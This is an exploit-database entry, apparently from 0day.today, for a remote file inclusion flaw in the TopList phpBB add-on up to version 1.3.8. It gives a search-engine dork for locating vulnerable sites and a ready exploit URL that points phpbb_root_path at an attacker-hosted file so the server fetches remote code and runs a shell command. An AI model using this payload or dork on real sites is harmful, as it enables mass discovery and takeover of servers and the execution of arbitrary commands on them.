id: 382
date: 04/26/2006
title: TopList <= 1.3.8 (phpBB Hack) Remote File Inclusion Vulnerability
author: [Oo]
cves: 

=================================================================
TopList <= 1.3.8 (phpBB Hack) Remote File Inclusion Vulnerability
=================================================================




Title: TopList Hack for PHPBB <= 1.3.8 Remote File Inclusion

Dork: inurl:"toplist.php" "powered by phpbb"
Credits: [Oo]

Exploit: /toplist.php?f=toplist_top10&phpbb_root_path=http://yourhost/cmd.gif?cmd=ls



#  0day.today [2023-03-23]  #